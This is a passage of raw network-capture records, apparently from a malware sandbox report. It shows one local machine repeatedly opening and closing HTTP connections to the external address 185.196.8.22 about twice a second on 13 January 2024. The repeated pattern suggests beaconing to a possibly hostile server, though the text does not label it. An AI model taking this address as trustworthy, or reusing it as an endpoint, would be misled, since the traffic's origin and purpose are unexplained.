                                                                                                                                                        Jan 13, 2024 06:33:38.043601990 CET4979480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:38.044367075 CET4979480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:38.230731964 CET8049794185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:38.266396999 CET8049794185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:38.266680002 CET4979480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:38.394239902 CET4979480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:38.395602942 CET4979580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:38.580713034 CET8049794185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:38.580899954 CET4979480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:38.581846952 CET8049795185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:38.581979990 CET4979580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:38.582840919 CET4979580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:38.768882036 CET8049795185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:38.799787998 CET8049795185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:38.799866915 CET4979580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:38.920867920 CET4979580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:38.921370029 CET4979680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:39.107454062 CET8049795185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:39.107517004 CET8049796185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:39.107553959 CET4979580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:39.107606888 CET4979680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:39.107883930 CET4979680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:39.294015884 CET8049796185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:39.329850912 CET8049796185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:39.329920053 CET4979680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:39.454591990 CET4979680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:39.455255985 CET4979780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:39.640718937 CET8049796185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:39.640841007 CET4979680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:39.641350985 CET8049797185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:39.641592979 CET4979780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:39.641729116 CET4979780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:39.828012943 CET8049797185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:39.858006954 CET8049797185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:39.858208895 CET4979780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:39.983839035 CET4979780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:39.984318972 CET4979880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:40.170248032 CET8049797185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:40.170317888 CET8049798185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:40.170404911 CET4979880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:40.170456886 CET4979780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:40.170829058 CET4979880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:40.358386993 CET8049798185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:40.394274950 CET8049798185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:40.394444942 CET4979880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:40.525578022 CET4979880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:40.526031017 CET4979980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:40.711922884 CET8049798185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:40.712145090 CET4979880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:40.712388039 CET8049799185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:40.712522984 CET4979980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:40.713318110 CET4979980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:40.899255991 CET8049799185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:40.930108070 CET8049799185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:40.930258036 CET4979980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:41.064013004 CET4979980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:41.065376043 CET4980080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:41.251234055 CET8049799185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:41.251306057 CET4979980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:41.252362967 CET8049800185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:41.252453089 CET4980080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:41.253204107 CET4980080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:41.440790892 CET8049800185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:41.475627899 CET8049800185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:41.475699902 CET4980080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:41.595482111 CET4980080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:41.812356949 CET8049800185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:41.812414885 CET4980080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:41.931997061 CET4980080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:41.932715893 CET4980180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:42.118005991 CET8049800185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:42.118181944 CET4980080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:42.118832111 CET8049801185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:42.119045019 CET4980180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:42.119170904 CET4980180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:42.306890965 CET8049801185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:42.347152948 CET8049801185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:42.347481966 CET4980180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:42.463112116 CET4980180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:42.463593960 CET4980280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:42.649461985 CET8049801185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:42.649574995 CET4980180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:42.649846077 CET8049802185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:42.650194883 CET4980280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:42.650336981 CET4980280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:42.836405039 CET8049802185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:42.867069960 CET8049802185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:42.867206097 CET4980280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:42.979331017 CET4980280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:43.200664997 CET8049802185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:43.200958014 CET4980280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:43.322757959 CET4980280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:43.323262930 CET4980380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:43.509552956 CET8049802185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:43.509586096 CET8049803185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:43.509836912 CET4980380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:43.509851933 CET4980280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:43.510046005 CET4980380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:43.695882082 CET8049803185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:43.726180077 CET8049803185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:43.726236105 CET4980380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:43.838408947 CET4980380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:44.055813074 CET8049803185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:44.055990934 CET4980380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:44.183020115 CET4980380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:44.184415102 CET4980480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:44.368886948 CET8049803185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:44.368940115 CET4980380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:44.370335102 CET8049804185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:44.370398998 CET4980480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:44.370754004 CET4980480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:44.556660891 CET8049804185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:44.591407061 CET8049804185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:44.594125032 CET4980480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:44.715099096 CET4980480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:44.717695951 CET4980580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:44.902287960 CET8049804185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:44.902359962 CET4980480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:44.905286074 CET8049805185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:44.905477047 CET4980580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:44.905829906 CET4980580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:45.092017889 CET8049805185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:45.125348091 CET8049805185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:45.125545025 CET4980580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:45.244316101 CET4980580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:45.244868994 CET4980680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:45.430573940 CET8049805185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:45.430787086 CET4980580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:45.430983067 CET8049806185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:45.431200027 CET4980680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:45.431524992 CET4980680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:45.617451906 CET8049806185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:45.648302078 CET8049806185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:45.648571968 CET4980680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:45.777637005 CET4980680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:45.778187990 CET4980780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:45.963848114 CET8049806185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:45.964087009 CET4980680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:45.964309931 CET8049807185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:45.964390993 CET4980780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:45.964760065 CET4980780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:46.150558949 CET8049807185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:46.186628103 CET8049807185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:46.186713934 CET4980780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:46.311291933 CET4980780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:46.312125921 CET4980880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:46.497473955 CET8049807185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:46.497575998 CET4980780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:46.497874022 CET8049808185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:46.498080969 CET4980880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:46.498207092 CET4980880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:46.684067011 CET8049808185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:46.714344025 CET8049808185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:46.714437008 CET4980880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:46.826745033 CET4980880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:47.043061018 CET8049808185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:47.043266058 CET4980880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:47.173468113 CET4980880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:47.174124956 CET4980980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:47.359277964 CET8049808185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:47.359379053 CET4980880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:47.359884977 CET8049809185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:47.359977007 CET4980980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:47.360348940 CET4980980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:47.546230078 CET8049809185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:47.581254959 CET8049809185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:47.581345081 CET4980980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:47.699724913 CET4980980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:47.700385094 CET4981080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:47.885603905 CET8049809185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:47.885874987 CET4980980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:47.886167049 CET8049810185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:47.886244059 CET4981080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:47.886632919 CET4981080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:48.072436094 CET8049810185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:48.110296965 CET8049810185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:48.110352993 CET4981080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:48.231163025 CET4981080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:48.231889009 CET4981180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:48.417247057 CET8049810185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:48.417311907 CET4981080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:48.417501926 CET8049811185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:48.417583942 CET4981180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:48.417948961 CET4981180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:48.603784084 CET8049811185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:48.634325981 CET8049811185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:48.634552956 CET4981180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:48.751009941 CET4981180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:48.751755953 CET4981280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:48.936925888 CET8049811185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:48.937030077 CET4981180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:48.937582016 CET8049812185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:48.937683105 CET4981280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:48.938045025 CET4981280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:49.123944998 CET8049812185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:49.160002947 CET8049812185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:49.160244942 CET4981280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:49.278000116 CET4981280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:49.278625965 CET4981380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:49.464046001 CET8049812185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:49.464268923 CET4981280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:49.464452028 CET8049813185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:49.464543104 CET4981380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:49.464920998 CET4981380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:49.650610924 CET8049813185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:49.681108952 CET8049813185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:49.681262970 CET4981380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:49.809413910 CET4981380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:49.810108900 CET4981480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:49.995415926 CET8049813185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:49.995623112 CET4981380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:49.996079922 CET8049814185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:49.996186018 CET4981480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:49.996552944 CET4981480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:50.182621002 CET8049814185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:50.222256899 CET8049814185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:50.222333908 CET4981480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:50.343775988 CET4981480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:50.344512939 CET4981580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:50.529742956 CET8049814185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:50.529849052 CET4981480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:50.530417919 CET8049815185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:50.530514956 CET4981580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:50.530996084 CET4981580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:50.716871023 CET8049815185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:50.747817039 CET8049815185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:50.747903109 CET4981580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:50.871721029 CET4981580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:50.872610092 CET4981680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:51.059303045 CET8049815185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:51.059420109 CET4981580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:51.060254097 CET8049816185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:51.060363054 CET4981680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:51.060671091 CET4981680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:51.246582031 CET8049816185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:51.283536911 CET8049816185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:51.283634901 CET4981680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:51.402827978 CET4981680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:51.403834105 CET4981780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:51.588895082 CET8049816185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:51.588979006 CET4981680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:51.589720964 CET8049817185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:51.589801073 CET4981780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:51.590154886 CET4981780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:51.776204109 CET8049817185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:51.807215929 CET8049817185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:51.807300091 CET4981780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:51.922252893 CET4981780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:51.922957897 CET4981880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:52.107934952 CET8049817185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:52.108037949 CET4981780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:52.108711958 CET8049818185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:52.108787060 CET4981880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:52.130019903 CET4981880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:52.316324949 CET8049818185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:52.354525089 CET8049818185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:52.354573965 CET4981880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:52.736371994 CET4981880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:52.736939907 CET4981980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:52.922256947 CET8049818185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:52.922329903 CET4981880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:52.922672987 CET8049819185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:52.922898054 CET4981980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:52.922993898 CET4981980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:53.108541012 CET8049819185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:53.144440889 CET8049819185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:53.144522905 CET4981980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:54.059453964 CET4981980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:54.059957981 CET4982080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:54.246432066 CET8049819185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:54.246629953 CET4981980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:54.246706963 CET8049820185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:54.246880054 CET4982080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:54.626684904 CET4982080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:54.812753916 CET8049820185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:54.847461939 CET8049820185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:54.847630024 CET4982080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:54.966784000 CET4982080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:54.967947960 CET4982180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:55.152877092 CET8049820185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:55.152968884 CET4982080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:55.153748035 CET8049821185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:55.153839111 CET4982180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:55.154104948 CET4982180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:55.339930058 CET8049821185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:55.376924038 CET8049821185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:55.376975060 CET4982180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:55.496412039 CET4982180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:55.497124910 CET4982280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:55.682521105 CET8049821185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:55.682590008 CET4982180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:55.683015108 CET8049822185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:55.683223963 CET4982280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:55.683355093 CET4982280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:55.868922949 CET8049822185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:55.899401903 CET8049822185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:55.899507999 CET4982280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:56.032516003 CET4982280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:56.033149004 CET4982380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:56.220143080 CET8049822185.196.8.22192.168.2.4
